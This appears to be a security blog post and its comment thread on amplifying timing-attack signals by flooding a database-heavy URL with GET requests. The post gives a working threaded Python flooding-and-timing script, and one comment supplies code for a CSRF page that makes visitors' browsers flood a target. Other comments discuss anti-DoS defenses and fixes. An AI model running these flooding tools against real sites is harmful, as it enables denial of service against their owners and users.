
Exaggerating Timing Attack Results Via GET Flooding

A post by Super-Friez got me thinking this evening about an actually useful application for GET request flooding. Normally we think of GET requests as a binary thing - one at a time or a full-on flood. But what if we launched just enough GET requests to impact server load rather than bandwidth? Picking the right URL would be critical here (one with DB impact, most likely).

Once you've found the right URL, launching a GET request flood against the server can seriously delay certain types of requests - especially requests that must touch a database twice instead of once, if the DB is part of what's being flooded. Suddenly something that is normally a difference of a few microseconds becomes a difference of seconds. Who cares? Well, I'm always curious whether there are any practical applications in hacking for DoS, and this appears to be one of them - at least in theory.
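
Here's a rough Python sketch of the idea - purely illustrative, with hypothetical URLs and thread counts: hammer a DB-heavy URL from a pool of threads while timing a single probe request, then compare that against an idle baseline.

    import threading
    import time
    import urllib.request

    FLOOD_URL = "http://target.example/search?q=expensive"  # hypothetical DB-heavy URL
    PROBE_URL = "http://target.example/login"               # hypothetical page to time
    FLOOD_THREADS = 50

    stop = threading.Event()

    def flooder():
        # Keep requesting the DB-heavy URL until told to stop.
        while not stop.is_set():
            try:
                urllib.request.urlopen(FLOOD_URL, timeout=10).read()
            except OSError:
                pass  # errors are fine; we only care about server load

    def probe():
        # Time a single request to the page whose code path we want to measure.
        start = time.monotonic()
        urllib.request.urlopen(PROBE_URL, timeout=60).read()
        return time.monotonic() - start

    baseline = probe()  # timing with the server idle

    threads = [threading.Thread(target=flooder) for _ in range(FLOOD_THREADS)]
    for t in threads:
        t.start()
    time.sleep(5)  # give the flood time to load up the DB

    loaded = probe()    # the one-query vs. two-query gap should now be much wider
    stop.set()
    for t in threads:
        t.join()

    print(f"baseline: {baseline:.3f}s, under load: {loaded:.3f}s")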

20 Responses to “Exaggerating Timing Attack Results Via GET Flooding”

  1. kuza55 Says:

    /me nods
    I’ve got some stuff lying around where this is integral to some (timing) attacks.

  2. ChrisP Says:

    There are network-level protection mechanisms against this type of attack. The anti-DoS device establishes a normal traffic profile during peacetime learning. Once that's done, it sets the anomaly threshold to twice the values acquired during learning. An abnormal rate of requests from a single source IP is rapidly flagged and sent to an analysis module, which will, for instance, 302 the requester and check whether the redirect is followed. If the 302 is obeyed and the rate doesn't decrease, the source is quarantined.
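
    In toy form, the logic looks something like this (thresholds and names are hypothetical; a real device does this at line rate):

    from collections import Counter

    baseline = {}       # requests/sec learned per source IP during peacetime
    counts = Counter()  # requests seen in the current window
    suspects = set()    # sources we 302'd and are watching
    quarantined = set()

    def on_request(src_ip, followed_redirect):
        counts[src_ip] += 1
        if src_ip in quarantined:
            return "drop"
        if src_ip in suspects:
            rate_ok = counts[src_ip] <= 2 * baseline.get(src_ip, 10)
            if followed_redirect and rate_ok:
                suspects.discard(src_ip)  # behaved, and the rate came back down
                return "serve"
            quarantined.add(src_ip)       # redirect ignored, or rate never dropped
            return "drop"
        if counts[src_ip] > 2 * baseline.get(src_ip, 10):
            suspects.add(src_ip)
            return "302"                  # challenge with a redirect
        return "serve"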

  3. c Says:

    Hmm. Say you take your "two database requests" app. What if the app leaves itself in a bad state when only the first of those DB calls goes through?

  4. dune73 Says:

    This plays into something that has been dubbed request delaying. It was discussed on the Apache httpd users list recently. See http://marc.info/?l=apache-httpd-users&m=119567035007066&w=2 (this is where the interesting bit starts)

    This is a scary form of DoS. It’s hard to defend against it.

  5. RSnake Says:

    @kuza55 - really? I’d be curious to see what it was.

    @ChrisP - I thought you guys were against the concept of training, because how can you ever say with confidence that you weren't attacked during your training? Obviously that would solve it if you /dev/nulled the requests, but then you run into the Victoria's Secret problem, where they thought they were under a GET request flood but it turned out to be everyone tuning into the online video cast of their models. Programmatically it was anomalous, but the intentions were totally benign (as benign as a million horny guys can be, I suppose).

    @c - that’s a good point. Obviously that would cause problems (this is anything but a perfect technique).

    @dune73 - It's not actually that hard to defend against, it's just not commonly defended against, and trying to defend against it brings lots of false positives. Probably the most elegant solution to GET DoS that I've seen was NetScaler's: they supplied a "question" in JavaScript space, and if your browser answered the question they'd let you in at higher priority; if not, they'd still let you in, but at way, way lower priority. That meant you at least had to write a robot that did some computational work - you couldn't just open a ton of sockets and leave the system hanging. There are lots of other anti-DDoS tools that don't pass along the actual request until the full GET request goes through (which in this case it would have to, in order to make the database request), so I find those solutions less elegant for this particular problem.
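
    The priority trick in toy form (hypothetical names - this is the concept, not NetScaler's actual code): requests carrying a valid answer to the JavaScript challenge go into a high-priority queue, and everything else waits in a low-priority queue that is only serviced when the high one is empty.

    import hashlib
    from collections import deque

    SECRET = "per-session-nonce"  # hypothetical server-side nonce

    def expected_answer(client_id):
        # The "question" shipped to the browser; answering it requires running JS.
        return hashlib.sha256((SECRET + client_id).encode()).hexdigest()

    high, low = deque(), deque()

    def enqueue(client_id, answer, request):
        if answer == expected_answer(client_id):
            high.append(request)  # proved it did the work: serve first
        else:
            low.append(request)   # still served, just way lower priority

    def next_request():
        if high:
            return high.popleft()
        return low.popleft() if low else None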

  6. ChrisP Says:

    In this case it's network (L3/L4) learning, which is a little less error-prone than L7 learning. I say this because your web site is rarely under constant DoS attack, while it could be undergoing free pen tests from web app hackers on a daily basis without raising the network traffic volume to alarming levels. Those free pen tests would indeed pollute a WAF's dictionary if it's in learning mode while the attack occurs. The L3/L4 anomaly detection device doesn't care about the HTTP POST/GET query string.

    The anti-DoS box classifies traffic as new conns (TCP SYNs), packets (all types), or requests (packets with payload). The post-learning threshold is quite liberal in the sense that it allows a burst of twice as many events as the baseline established during learning. The million horny guys have a unique characteristic: they're a million different source IPs. An anti-DoS device would attempt to distinguish legitimate requests from spoofed ones using SYN cookies. They would then be sent on to the HTTP servers - there are a few techniques on load balancers that can deal with flash crowds, such as redirecting users to sorry servers.

  7. bronc Says:

    It’s interesting this topic came up, as a few weeks ago I was looking at this same issue, but from more of a performance point of view.

    Having a background in security crap, my initial thought was about how I'd figured out a way to DoS basically every site on the net running the commercial software I was having this problem with.

    On a FreeBSD system running Apache 2 and MySQL, with the application itself coded in PHP, I made repeated calls to several dynamic URLs generated by the app itself and was able to stop my box in its tracks. The system is a VERY powerful Dell PowerEdge (quad core, several gigs of RAM, etc.), yet because of the overhead of the SQL calls and PHP itself (total crap - Perl 6 anyone?), it was easy to lock up a processor and then watch the context switching begin - within a minute or so the processes started running out of available memory (as limited by the kernel) as more requests came in. This caused a delay in each call, until eventually Apache ran out of processes it could start.

    As each call slowed the box down, the delays started adding up; even with KeepAlives off in Apache, it still ran out of processes within an hour or so.

    Really this is just as effective as eating up someone's bandwidth with a DoS, but a lot easier. I haven't played with AJAX frameworks a lot, but I can imagine they might be ripe for the picking as well.

    PS. Did anyone know RSnake moved to Texas for his favorite pastime? Armadillo racing! You should see his trophy case!

  8. Ronald van den Heetkamp Says:

    As for Apache, most HTTP requests are processed simultaneously in memory, and the process is usually not killed after the connection closes; a second HTTP request runs in the same memory process as the previously initiated one, which results in no detectable difference at the client.

    So I nod horizontally today :)

  9. RSnake Says:

    @ChrisP - ah, I didn’t realize you were talking about TCP packets and not HTTP requests. That makes a lot more sense.

    @bronc - awesome, that is pretty cool, and exactly what I was talking about.

    P.S. Did everyone know that Bronc went to prison for his favorite pastime? I'll let the imagination run wild. ;)

    @Ronald - That is absolutely true if you only have two connections that are non-blocking (which is almost never actually the case when you're talking about DB inserts). But if the server allows 100 simultaneous connections and you use 99 for your DoS and the remaining 1 for your test, you're often reaching the point at which the server cannot handle much more throughput without visible changes in how long things take to run (again, because DBs are almost always blocking).

  10. Ronald van den Heetkamp Says:

    So what you're talking about here is based on a child-process denial of service?

    'Cause it depends: Apache has a default five-child-process limit, so if you increase that, it wouldn't be a problem. I'm not sure how many sysadmins actually do that, but yes, it could work - though it's easy to solve by raising the limit rather than adding memory (bad). It also depends on how you run PHP, e.g. mod_php (loaded into memory, faster) or FastCGI (slower). It's a trade-off here again, but increasing memory isn't the solution.

    Still, I can't see how it can be used for the timing attacks you're talking about, because if you exaggerate a timing attack this way you wouldn't get much benefit from it: it stalls the whole thing and becomes even more unpredictable when you don't know when Apache starts swapping due to high memory use, or because of the arguments above. As I would put it: it becomes more unstable instead of giving more precise time diffs.

    If I'm wrong, do let me know.

  11. RSnake Says:

    @Ronald - It doesn't make it unstable (you're thinking about a real DoS; I'm thinking about flooding just enough that you start seeing delays), it just slows things down. Let's say you have a 10ms difference between state A and state B. That can be muddied by network latency, while a difference of a few seconds really can't. It can help remove one question mark from your timing attack. See what I'm saying?

  12. Ronald van den Heetkamp Says:

    Aaaaah, okay, you want to reach stability through it! I think that's feasible, granted that no other users are hitting the thing at the same time, like hitting refresh every couple of moments, which makes it muddy again. ;)

    So yeah, it's plausible when you can control the noise (other users) that could disturb it. It would be nice to try this out some time; I guess it's hard to draw conclusions yet. ;)

  13. digi7al64 Says:

    Have I missed something, or are we simply talking about flooding a server with GET requests? If so, why not use CSRF to launch such attacks? That way the attack is never generated from a single IP and is much harder to block. Tie that in with some unique URL generation code (to bypass URL matching) and you have a poor man's DDoS attack.
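
    Something like this (hypothetical target URL) - a page that makes every visitor's browser fire off GETs with unique query strings, so caches and simple URL-match filters never see the same request twice:

    import uuid

    def csrf_flood_page(target, count=50):
        # Each img tag triggers a GET with a unique cache-busting parameter.
        tags = "\n".join(
            f'<img src="{target}?cachebust={uuid.uuid4().hex}" width="1" height="1">'
            for _ in range(count)
        )
        return f"<html><body>{tags}</body></html>"

    print(csrf_flood_page("http://victim.example/search"))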

  14. digi7al64 Says:

    Oops, should have read the title - so essentially you want to slow the server down to determine time delays. Well, you could use the attack I mentioned to generate traffic and then use your own session as a "control" to determine a baseline. Either way, though, I think you are putting too many variables into the equation to obtain a definitive conclusion using this method.

  15. SaveBurma! Says:

    By the way, timing attacks are hot in attacking VoIP.
    Nortel has been doing a good job on defense.

  16. bronc Says:

    A good way to see the delay times is to use MySQL's CLI to look at its debugging info (threads, delays, long queries, etc.). This can really show you, from the MySQL side, how those requests to Apache slow things down. On our system we could watch it happen in real time, with really bad/slow queries.

    PS. When ya coming back home? I’m all alone!

  17. RSnake Says:

    @digi7al64 - I don't think using other people to do CSRF GET flooding would work, because you'd have no idea how much traffic you were sending. If you controlled the flooding, though, you'd have a much better sense of what was going on. And you're right that it would add in an extra variable, but only if you performed the test just once. If you do it a few dozen times you can be almost 100% sure the test result is valid.
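
    In code terms (reusing the hypothetical probe() from the sketch in the post above), that just means running the probe a few dozen times under each condition and comparing medians, so a single noisy sample can't fool you:

    import statistics

    def median_probe(probe, trials=30):
        # The median is robust against the occasional network hiccup.
        return statistics.median(probe() for _ in range(trials))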

    @bronc - Isn’t Mr. Big taking care of you?

  18. bronc Says:

    Mr. Big quit and is moving up to the Bay - where I just moved from. I'm stuck with his gig now!

  19. Matt Says:

    I personally know about GET floods bringing down production systems when interacting with the db.

    I work for a very large company, and we were bringing in a large search provider to "improve" our intranet search experience. The way the search appliance worked was to gather a list of URLs to crawl and go into a while loop similar to the following:

    while (there are more pages to crawl) {
        get a page from the list
        open a new connection to the page
        get the html response
        release the connection
        parse the html for new links
        add new links to pages list
    }

    The problem we ran into was that a “Production” application was designed like this:

    On receipt of a GET request {
        if no session exists {
            create a new session
            create a new db connection object
            store db connection object into session
        }

        get db connection from session
        access information
        restore connection object to session object
    }

    Well, with a little study we found that the appliance, using only GET requests, brought down the entire site at a crucial point during the night, potentially costing millions of dollars.

    The issue turned out to be that the search appliance was creating sessions on the site faster than the Java garbage collector could reap them, which eventually led to full resource consumption of db connections.

    So YES, GETs can DoS a site.
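
    For what it's worth, the usual fix for the pattern above (sketched here with hypothetical names) is a bounded shared connection pool, so sessions borrow and return connections instead of each owning one:

    import queue

    class ConnectionPool:
        def __init__(self, make_conn, size=20):
            # Open a fixed number of connections up front; never more.
            self._pool = queue.Queue(maxsize=size)
            for _ in range(size):
                self._pool.put(make_conn())

        def acquire(self, timeout=5.0):
            # Blocks (bounded) instead of opening a connection per session.
            return self._pool.get(timeout=timeout)

        def release(self, conn):
            self._pool.put(conn)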

  20. r Says:

    As a system admin for a large dedicated hosting provider, I am asked to help sites experiencing "DoS attacks" on a routine basis. Usually there is no DoS attack, just non-indexed SQL queries in per-connection logic.

    "Solving" these DoS attacks is often as simple as adding indexes to the tables behind high-volume queries, adding PHP bytecode caching (APC, usually), and enabling KeepAlives.